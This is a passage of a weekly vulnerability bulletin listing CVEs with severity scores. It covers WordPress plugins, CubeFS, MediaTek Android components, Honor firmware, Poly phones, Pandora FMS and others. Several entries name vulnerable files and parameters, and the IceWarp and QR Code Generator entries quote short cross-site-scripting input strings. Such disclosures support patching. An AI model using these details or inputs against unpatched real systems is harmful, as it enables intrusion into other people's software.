wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WS Form WS Form LITE – Drag & Drop Contact Form Builder for WordPress. This issue affects WS Form LITE – Drag & Drop Contact Form Builder for WordPress through 1.9.170. 2023-12-29 7.2 CVE-2023-52135
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Naa986 WP Stripe Checkout. This issue affects WP Stripe Checkout through 1.2.2.37. 2024-01-05 7.5 CVE-2023-52143
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Really Simple Plugins Recipe Maker For Your Food Blog from Zip Recipes. This issue affects Recipe Maker For Your Food Blog from Zip Recipes through 8.1.0. 2023-12-31 7.6 CVE-2023-52180
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Everestthemes Everest Backup – WordPress Cloud Backup, Migration, Restore & Cloning Plugin. This issue affects Everest Backup – WordPress Cloud Backup, Migration, Restore & Cloning Plugin through 2.1.9. 2023-12-31 7.5 CVE-2023-52185
audit@patchstack.com
wordpress — wordpress The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘device’ header in all versions up to, and including, 2.8.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-01-03 7.2 CVE-2023-7027
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress
 		 Deserialization of Untrusted Data vulnerability in YITH YITH WooCommerce Product Add-Ons. This issue affects YITH WooCommerce Product Add-Ons through 4.3.0. 2023-12-31 9.1 CVE-2023-49777
audit@patchstack.com
xnview — xnview_classic XnView Classic before 2.51.3 on Windows has a Write Access Violation at xnview.exe+0x3ADBD0. 2023-12-29 9.8 CVE-2023-52173
cve@mitre.org
cve@mitre.org
xnview — xnview_classic XnView Classic before 2.51.3 on Windows has a Write Access Violation at xnview.exe+0x3125D6. 2023-12-29 9.8 CVE-2023-52174
cve@mitre.org
cve@mitre.org
yaztek_software_technologies_and_computer_systems — e-commerce_software
 		 Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Yaztek Software Technologies and Computer Systems E-Commerce Software allows SQL Injection. This issue affects E-Commerce Software: through 20231229.  NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-29 9.8 CVE-2023-4674
iletisim@usom.gov.tr
zzcms — zzcms ZZCMS 2023 has a file upload vulnerability in 3/E_bak5.1/upload/index.php, allowing attackers to exploit this loophole to gain server privileges and execute arbitrary code. 2023-12-29 9.8 CVE-2023-50104
cve@mitre.org

Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product		 Description Published CVSS Score Source & Patch Info
antisamy-dotnet — antisamy-dotnet OWASP AntiSamy .NET is a library for performing cleansing of HTML coming from untrusted sources. Prior to version 1.2.0, there is a potential for a mutation cross-site scripting (mXSS) vulnerability in AntiSamy caused by flawed parsing of the HTML being sanitized. To be subject to this vulnerability the `preserveComments` directive must be enabled in your policy file and also allow for certain tags at the same time. As a result, certain crafty inputs can result in elements in comment tags being interpreted as executable when using AntiSamy’s sanitized output. This is patched in OWASP AntiSamy .NET 1.2.0 and later. See important remediation details in the reference given below. As a workaround, manually edit the AntiSamy policy file (e.g., antisamy.xml) by deleting the `preserveComments` directive or setting its value to `false`, if present. Also, it would be useful to make AntiSamy remove the `noscript` tag by adding a line described in the GitHub Security Advisory to the tag definitions under the `` node or deleting it entirely if present. As the previously mentioned policy settings are preconditions for the mXSS attack to work, changing them as recommended should be sufficient to protect you against this vulnerability when using a vulnerable version of this library. However, the existing bug would still be present in AntiSamy or its parser dependency (HtmlAgilityPack). The safety of this workaround relies on configurations that may change in the future and don’t address the root cause of the vulnerability. As such, it is strongly recommended to upgrade to a fixed version of AntiSamy. 2024-01-02 6.1 CVE-2023-51652
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
campcodes — online_college_library_system A vulnerability was found in Campcodes Online College Library System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/borrow_add.php of the component HTTP POST Request Handler. The manipulation of the argument student leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249362 is the identifier assigned to this vulnerability. 2023-12-30 4.7 CVE-2023-7175
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cloudflare,_inc. — wrangler Sending specially crafted HTTP requests and inspector messages to Wrangler’s dev server could result in any file on the user’s computer being accessible over the local network. An attacker that could trick any user on the local network into opening a malicious website could also read any file. 2023-12-29 5.7 CVE-2023-7079
cna@cloudflare.com
cna@cloudflare.com
cna@cloudflare.com
cloudflare,_inc. — zlib Cloudflare version of zlib library was found to be vulnerable to memory corruption issues affecting the deflation algorithm implementation (deflate.c). The issues resulted from improper input validation and heap-based buffer overflow. A local attacker could exploit the problem during compression using a crafted malicious file potentially leading to denial of service of the software. Patches: The issue has been patched in commit 8352d10 https://github.com/cloudflare/zlib/commit/8352d108c05db1bdc5ac3bdf834dad641694c13c . The upstream repository is not affected. 2024-01-04 4 CVE-2023-6992
cna@cloudflare.com
cna@cloudflare.com
code-projects — client_details_system A vulnerability was found in code-projects Client Details System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/regester.php. The manipulation of the argument fname/lname/email/contact leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249146 is the identifier assigned to this vulnerability. 2023-12-29 4.8 CVE-2023-7143
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — qr_code_generator A vulnerability was found in code-projects QR Code Generator 1.0. It has been classified as problematic. This affects an unknown part of the file /download.php?file=author.png. The manipulation of the argument file with the input “> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249153 was assigned to this vulnerability. 2023-12-29 6.1 CVE-2023-7149
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
codeastro — internet_banking_system A vulnerability, which was classified as critical, has been found in CodeAstro Internet Banking System up to 1.0. This issue affects some unknown processing of the file pages_account.php of the component Profile Picture Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249509 was assigned to this vulnerability. 2024-01-02 6.3 CVE-2024-0194
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
craft_cms — craft_cms Craft is a content management system. This is a potential moderate impact, low complexity privilege escalation vulnerability in Craft starting in 3.x prior to 3.9.6 and 4.x prior to 4.4.16 with certain user permissions setups. This has been fixed in Craft 4.4.16 and Craft 3.9.6. Users should ensure they are running at least those versions. 2024-01-03 5.4 CVE-2024-21622
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
cubefs — cubefs CubeFS is an open-source cloud-native file storage system. A security vulnerability was found in CubeFS HandlerNode in versions prior to 3.3.1 that could allow authenticated users to send maliciously crafted requests that would crash the ObjectNode and deny other users from using it. The root cause was improper handling of incoming HTTP requests that could allow an attacker to control the amount of memory that the ObjectNode would allocate. A malicious request could make the ObjectNode allocate more memory that the machine had available, and the attacker could exhaust memory by way of a single malicious request. An attacker would need to be authenticated in order to invoke the vulnerable code with their malicious request and have permissions to delete objects. In addition, the attacker would need to know the names of existing buckets of the CubeFS deployment – otherwise the request would be rejected before it reached the vulnerable code. As such, the most likely attacker is an inside user or an attacker that has breached the account of an existing user in the cluster. The issue has been patched in v3.3.1. There is no other mitigation besides upgrading. 2024-01-03 6.5 CVE-2023-46738
security-advisories@github.com
security-advisories@github.com
cubefs — cubefs CubeFS is an open-source cloud-native file storage system. A vulnerability was found during in the CubeFS master component in versions prior to 3.3.1 that could allow an untrusted attacker to steal user passwords by carrying out a timing attack. The root case of the vulnerability was that CubeFS used raw string comparison of passwords. The vulnerable part of CubeFS was the UserService of the master component. The UserService gets instantiated when starting the server of the master component. The issue has been patched in v3.3.1. For impacted users, there is no other way to mitigate the issue besides upgrading. 2024-01-03 6.5 CVE-2023-46739
security-advisories@github.com
security-advisories@github.com
cubefs — cubefs CubeFS is an open-source cloud-native file storage system. Prior to version 3.3.1, CubeFS used an insecure random string generator to generate user-specific, sensitive keys used to authenticate users in a CubeFS deployment. This could allow an attacker to predict and/or guess the generated string and impersonate a user thereby obtaining higher privileges. When CubeFS creates new users, it creates a piece of sensitive information for the user called the “accessKey”. To create the “accesKey”, CubeFS uses an insecure string generator which makes it easy to guess and thereby impersonate the created user. An attacker could leverage the predictable random string generator and guess a users access key and impersonate the user to obtain higher privileges. The issue has been fixed in v3.3.1. There is no other mitigation than to upgrade. 2024-01-03 6.5 CVE-2023-46740
security-advisories@github.com
security-advisories@github.com
cubefs — cubefs CubeFS is an open-source cloud-native file storage system. A vulnerability was found in CubeFS prior to version 3.3.1 that could allow users to read sensitive data from the logs which could allow them escalate privileges. CubeFS leaks configuration keys in plaintext format in the logs. These keys could allow anyone to carry out operations on blobs that they otherwise do not have permissions for. For example, an attacker that has successfully retrieved a secret key from the logs can delete blogs from the blob store. The attacker can either be an internal user with limited privileges to read the log, or they can be an external user who has escalated privileges sufficiently to access the logs. The vulnerability has been patched in v3.3.1. There is no other mitigation than upgrading. 2024-01-03 4.8 CVE-2023-46741
security-advisories@github.com
security-advisories@github.com
cubefs — cubefs CubeFS is an open-source cloud-native file storage system. CubeFS prior to version 3.3.1 was found to leak user’s secret keys and access keys in the logs in multiple components. When CubeCS creates new users, it leaks the user’s secret key. This could allow a lower-privileged user with access to the logs to retrieve sensitive information and impersonate other users with higher privileges than themselves. The issue has been patched in v3.3.1. There is no other mitigation than upgrading CubeFS. 2024-01-03 4.8 CVE-2023-46742
security-advisories@github.com
security-advisories@github.com
google — android In keyInstall, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308607; Issue ID: ALPS08308607. 2024-01-02 6.7 CVE-2023-32872
security@mediatek.com
google — android In battery, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308070; Issue ID: ALPS08308070. 2024-01-02 6.7 CVE-2023-32877
security@mediatek.com
google — android In battery, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308070; Issue ID: ALPS08308064. 2024-01-02 6.7 CVE-2023-32879
security@mediatek.com
google — android In battery, there is a possible memory corruption due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308070; Issue ID: ALPS08308616. 2024-01-02 6.7 CVE-2023-32882
security@mediatek.com
google — android In Engineer Mode, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08282249; Issue ID: ALPS08282249. 2024-01-02 6.7 CVE-2023-32883
security@mediatek.com
google — android In netdagent, there is a possible information disclosure due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07944011; Issue ID: ALPS07944011. 2024-01-02 6.7 CVE-2023-32884
security@mediatek.com
google — android In display drm, there is a possible memory corruption due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07780685; Issue ID: ALPS07780685. 2024-01-02 6.7 CVE-2023-32885
security@mediatek.com
google — android In bluetooth service, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07933038; Issue ID: MSV-559. 2024-01-02 6.7 CVE-2023-32891
security@mediatek.com
google — android In keyInstall, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308607; Issue ID: ALPS08304217. 2024-01-02 4.4 CVE-2023-32875
security@mediatek.com
google — android In keyInstall, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308612; Issue ID: ALPS08308612. 2024-01-02 4.4 CVE-2023-32876
security@mediatek.com
google — android In battery, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308070; Issue ID: ALPS08307992. 2024-01-02 4.4 CVE-2023-32878
security@mediatek.com
google — android In battery, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308070; Issue ID: ALPS08308076. 2024-01-02 4.4 CVE-2023-32880
security@mediatek.com
google — android In battery, there is a possible information disclosure due to an integer overflow. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08308070; Issue ID: ALPS08308080. 2024-01-02 4.4 CVE-2023-32881
security@mediatek.com
hail — hail Hail is an open-source, general-purpose, Python-based data analysis tool with additional data types and methods for working with genomic data. Hail relies on OpenID Connect (OIDC) email addresses from ID tokens to verify the validity of a user’s domain, but because users have the ability to change their email address, they could create accounts and use resources in clusters that they should not have access to. For example, a user could create a Microsoft or Google account and then change their email to `test@example.org`. This account can then be used to create a Hail Batch account in Hail Batch clusters whose organization domain is `example.org`. The attacker is not able to access private data or impersonate another user, but they would have the ability to run jobs if Hail Batch billing projects are enabled and create Azure Tenants if they have Azure Active Directory Administrator access. 2023-12-29 5.3 CVE-2023-51663
security-advisories@github.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by improper access control (Unauthenticated File Download) vulnerability. An unauthenticated user can download certain files. 2024-01-03 5.4 CVE-2023-50344
psirt@hcl.com
hihonor — fri-an00_firmware Some Honor products are affected by file writing vulnerability, successful exploitation could cause information disclosure. 2023-12-29 5.5 CVE-2023-23426
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — honorboardapp Some Honor products are affected by information leak vulnerability; successful exploitation could cause the information leak. 2023-12-29 5.5 CVE-2023-23434
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — lge-an00_firmware Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions 2023-12-29 5.5 CVE-2023-23438
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — lge-an00_firmware Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak. 2023-12-29 5.5 CVE-2023-23439
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — lge-an00_firmware Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak. 2023-12-29 5.5 CVE-2023-23440
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by incorrect privilege assignment vulnerability; successful exploitation could cause information leak. 2023-12-29 5.5 CVE-2023-51429
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_ui Some Honor products are affected by out of bounds read vulnerability, successful exploitation could cause information leak. 2023-12-29 5.5 CVE-2023-23441
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_ui Some Honor products are affected by incorrect privilege assignment vulnerability; successful exploitation could cause information leak. 2023-12-29 5.5 CVE-2023-51430
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_ui Some Honor products are affected by out of bounds read vulnerability, successful exploitation could cause information leak. 2023-12-29 5.5 CVE-2023-51432
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_ui Some Honor products are affected by incorrect privilege assignment vulnerability; successful exploitation could cause information leak. 2023-12-29 5.5 CVE-2023-51433
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_ui Some Honor products are affected by type confusion vulnerability; successful exploitation could cause denial of service. 2023-12-29 5.5 CVE-2023-6939
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — phoneservice Some Honor products are affected by incorrect privilege assignment vulnerability; successful exploitation could cause device service exceptions. 2023-12-29 5.5 CVE-2023-51431
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — vmall Some Honor products are affected by information leak vulnerability; successful exploitation could cause the information leak 2023-12-29 5.5 CVE-2023-23437
3836d913-7555-4dd0-a509-f5667fdf5fe4
hitachi_energy — multiple_products A vulnerability exists in the Relion update package signature validation. A tampered update package could cause the IED to restart. After restart the device is back to normal operation. An attacker could exploit the vulnerability by first gaining access to the system with security privileges and attempt to update the IED with a malicious update package. Successful exploitation of this vulnerability will cause the IED to restart, causing a temporary Denial of Service. 2024-01-04 4.5 CVE-2022-3864
cybersecurity@hitachienergy.com
hospital_management_system — hospital_management_system A vulnerability, which was classified as problematic, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file registration.php. The manipulation of the argument First Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249357 was assigned to this vulnerability. 2023-12-30 4.3 CVE-2023-7173
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
icewarp — icewarp A vulnerability classified as problematic has been found in IceWarp 12.0.2.1/12.0.3.1. This affects an unknown part of the file /install/ of the component Utility Download Handler. The manipulation of the argument lang with the input 1%27″()%26%25 leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249759. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-05 4.3 CVE-2024-0246
cna@vuldb.com
cna@vuldb.com
ipaddress — ipaddress An issue in the component IPAddressBitsDivision of IPAddress v5.1.0 leads to an infinite loop. 2023-12-29 5.5 CVE-2023-50570
cve@mitre.org
jline — jline An issue in the component GroovyEngine.execute of jline-groovy v3.24.1 allows attackers to cause an OOM (OutofMemory) error. 2023-12-29 5.5 CVE-2023-50572
cve@mitre.org
kernelsu — kernelsu KernelSU is a Kernel-based root solution for Android devices. In versions 0.7.1 and prior, the logic of get apk path in KernelSU kernel module can be bypassed, which causes any malicious apk named `me.weishu.kernelsu` get root permission. If a KernelSU module installed device try to install any not checked apk which package name equal to the official KernelSU Manager, it can take over root privileges on the device. As of time of publication, a patched version is not available. 2024-01-02 6.7 CVE-2023-49794
security-advisories@github.com
security-advisories@github.com
kruise — kruise Kruise provides automated management of large-scale applications on Kubernetes. Starting in version 0.8.0 and prior to versions 1.3.1, 1.4.1, and 1.5.2, an attacker who has gained root privilege of the node that kruise-daemon run can leverage the kruise-daemon pod to list all secrets in the entire cluster. After that, the attacker can leverage the “captured” secrets (e.g. the kruise-manager service account token) to gain extra privileges such as pod modification. Versions 1.3.1, 1.4.1, and 1.5.2 fix this issue. A workaround is available. For users that do not require imagepulljob functions, they can modify kruise-daemon-role to drop the cluster level secret get/list privilege. 2024-01-03 6.5 CVE-2023-30617
security-advisories@github.com
lenovo — lenovo_browser_mobile A vulnerability was reported in the Lenovo Browser Mobile and Lenovo Browser HD Apps for Android that could allow an attacker to craft a payload that could result in the disclosure of sensitive information. 2024-01-03 6.5 CVE-2023-6540
psirt@lenovo.com
libredwg — libredwg Versions of the package libredwg before 0.12.5.6384 are vulnerable to Denial of Service (DoS) due to an out-of-bounds read involving section->num_pages in decode_r2007.c. 2024-01-02 5.5 CVE-2023-26157
report@snyk.io
report@snyk.io
report@snyk.io
linux — kernel A memory leak problem was found in ctnetlink_create_conntrack in net/netfilter/nf_conntrack_netlink.c in the Linux Kernel. This issue may allow a local attacker with CAP_NET_ADMIN privileges to cause a denial of service (DoS) attack due to a refcount overflow. 2024-01-02 6.1 CVE-2023-7192
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
logobee — logobee LogoBee 0.2 allows updates.php?id= XSS. 2023-12-30 6.1 CVE-2023-52257
cve@mitre.org
magic-api — magic-api A vulnerability has been found in Magic-Api up to 2.0.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /resource/file/api/save?auto=1. The manipulation leads to code injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249511. 2024-01-02 6.3 CVE-2024-0196
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
mattermost — mattermost Mattermost version 8.1.6 and earlier fails to sanitize channel mention data in posts, which allows an attacker to inject markup in the web client. 2023-12-29 6.1 CVE-2023-7113
responsibledisclosure@mattermost.com
mattermost — mattermost Mattermost fails to properly verify the permissions needed for viewing archived public channels, allowing a member of one team to get details about the archived public channels of another team via the GET /api/v4/teams//channels/deleted endpoint. 2024-01-02 4.3 CVE-2023-47858
responsibledisclosure@mattermost.com
mattermost — mattermost Mattermost fails to scope the WebSocket response around notified users to a each user separately resulting in the WebSocket broadcasting the information about who was notified about a post to everyone else in the channel. 2024-01-02 4.3 CVE-2023-48732
responsibledisclosure@mattermost.com
mdaemon — securitygateway MDaemon SecurityGateway through 9.0.3 allows XSS via a crafted Message Content Filtering rule. This might allow domain administrators to conduct attacks against global administrators. 2023-12-31 4.8 CVE-2023-52269
cve@mitre.org
cve@mitre.org
mediatek — software_development_kit In wlan driver, there is a possible PIN crack due to use of insufficiently random values. This could lead to local information disclosure with no execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00325055; Issue ID: MSV-868. 2024-01-02 5.5 CVE-2023-32831
security@mediatek.com
moxa– oncell_g3150a-lte_series A clickjacking vulnerability has been identified in OnCell G3150A-LTE Series firmware versions v1.3 and prior. This vulnerability is caused by incorrectly restricts frame objects, which can lead to user confusion about which interface the user is interacting with. This vulnerability may lead the attacker to trick the user into interacting with the application. 2023-12-31 5.3 CVE-2023-6093
psirt@moxa.com
moxa– oncell_g3150a-lte_series A vulnerability has been identified in OnCell G3150A-LTE Series firmware versions v1.3 and prior. The vulnerability results from lack of protection for sensitive information during transmission. An attacker eavesdropping on the traffic between the web browser and server may obtain sensitive information. This type of attack could be executed to gather sensitive information or to facilitate a subsequent attack against the target. 2023-12-31 5.3 CVE-2023-6094
psirt@moxa.com
novel-plus — novel-plus A vulnerability classified as problematic has been found in Novel-Plus up to 4.2.0. This affects an unknown part of the file /user/updateUserInfo of the component HTTP POST Request Handler. The manipulation of the argument nickName leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is c62da9bb3a9b3603014d0edb436146512631100d. It is recommended to apply a patch to fix this issue. The identifier VDB-249201 was assigned to this vulnerability. 2023-12-29 5.4 CVE-2023-7166
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
novel-plus — novel-plus A vulnerability was found in Novel-Plus up to 4.2.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file novel-admin/src/main/java/com/java2nb/novel/controller/FriendLinkController.java of the component Friendly Link Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The patch is named d6093d8182362422370d7eaf6c53afde9ee45215. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-249307. 2023-12-29 4.8 CVE-2023-7171
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nueva_ecija_engineer_online_portal — nueva_ecija_engineer_online_portal A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file downloadable.php of the component Add Downloadable. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249505 was assigned to this vulnerability. 2024-01-02 6.3 CVE-2024-0192
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nueva_ecija_engineer_online_portal — nueva_ecija_engineer_online_portal A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/uploads/. The manipulation leads to file and directory information exposure. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249504. 2024-01-02 5.3 CVE-2024-0191
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nueva_ecija_engineer_online_portal — nueva_ecija_engineer_online_portal A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been rated as critical. This issue affects some unknown processing of the file dasboard_teacher.php of the component Avatar Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249443. 2024-01-02 4.7 CVE-2024-0185
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
ocsinventory — ocsinventory OCSInventory allow stored email template with special characters that lead to a Stored cross-site Scripting. 2024-01-04 4.9 CVE-2023-3726
help@fluidattacks.com
help@fluidattacks.com
openharmony — openharmony in OpenHarmony v3.2.2 and prior versions allow a local attacker cause DOS through occupy all resources 2024-01-02 5.5 CVE-2023-47216
scy@openharmony.io
openharmony — openharmony in OpenHarmony v3.2.2 and prior versions allow a local attacker cause multimedia camera crash through modify a released pointer. 2024-01-02 5.5 CVE-2023-47857
scy@openharmony.io
openharmony — openharmony in OpenHarmony v3.2.2 and prior versions allow a local attacker cause multimedia player crash through modify a released pointer. 2024-01-02 5.5 CVE-2023-48360
scy@openharmony.io
openharmony — openharmony in OpenHarmony v3.2.2 and prior versions allow a local attacker cause multimedia player crash through modify a released pointer. 2024-01-02 5.5 CVE-2023-49135
scy@openharmony.io
openxiangshan — xiangshan An issue was discovered in XiangShan v2.1, allows local attackers to obtain sensitive information via the L1D cache. 2023-12-30 5.5 CVE-2023-50559
cve@mitre.org
cve@mitre.org
own_health_record — own_health_record A vulnerability was found in MdAlAmin-aol Own Health Record 0.1-alpha/0.2-alpha/0.3-alpha/0.3.1-alpha. It has been rated as problematic. This issue affects some unknown processing of the file includes/logout.php. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. Upgrading to version 0.4-alpha is able to address this issue. The patch is named 58b413aa40820b49070782c786c526850ab7748f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-249191. 2023-12-30 4.3 CVE-2018-25096
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
pandora_fms — pandora_fms Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). Allows you to edit the Web Console user notification options. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 6.1 CVE-2023-41813
security@pandorafms.com
pandora_fms — pandora_fms Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). Through an HTML payload (iframe tag) it is possible to carry out XSS attacks when the user receiving the messages opens their notifications. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 6.1 CVE-2023-41814
security@pandorafms.com
pandora_fms — pandora_fms Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). Malicious code could be executed in the File Manager section. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 6.1 CVE-2023-41815
security@pandorafms.com
pandora_fms — pandora_fms Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). It was possible to execute malicious JS code on Visual Consoles. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 6.1 CVE-2023-44089
security@pandorafms.com
poly — multiple_products A vulnerability, which was classified as problematic, was found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60. Affected is an unknown function of the component Configuration File Import. The manipulation of the argument device.auth.localAdminPassword leads to unverified password change. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249258 is the identifier assigned to this vulnerability. 2023-12-29 6.5 CVE-2023-4465
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
poly — multiple_products A vulnerability classified as problematic has been found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60. This affects an unknown part of the component Web Configuration Application. The manipulation leads to insufficiently random values. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249255. 2023-12-29 5.9 CVE-2023-4462
cna@vuldb.com
cna@vuldb.com
nvd@nist.gov
cna@vuldb.com
cna@vuldb.com
poly — multiple_products A vulnerability has been found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Web Interface. The manipulation leads to protection mechanism failure. The attack can be launched remotely. The vendor explains that they do not regard this as a vulnerability as this is a feature that they offer to their customers who have a variety of environmental needs that are met through different firmware builds. To avoid potential roll-back attacks, they remove vulnerable builds from the public servers as a remediation effort. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249259. 2023-12-29 4.9 CVE-2023-4466
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
poly — trio_8800_firmware A vulnerability was found in Poly Trio 8800 7.2.6.0019 and classified as critical. Affected by this issue is some unknown functionality of the component Test Automation Mode. The manipulation leads to backdoor. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249260. 2023-12-29 6.6 CVE-2023-4467
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
prestashop — prestashop PrestaShop is an open-source e-commerce platform. Prior to version 8.1.3, the isCleanHtml method is not used on this this form, which makes it possible to store a cross-site scripting payload in the database. The impact is low because the HTML is not interpreted in BO, thanks to twig’s escape mechanism. In FO, the cross-site scripting attack is effective, but only impacts the customer sending it, or the customer session from which it was sent. This issue affects those who have a module fetching these messages from the DB and displaying it without escaping HTML. Version 8.1.3 contains a patch for this issue. 2024-01-02 5.4 CVE-2024-21628
security-advisories@github.com
security-advisories@github.com
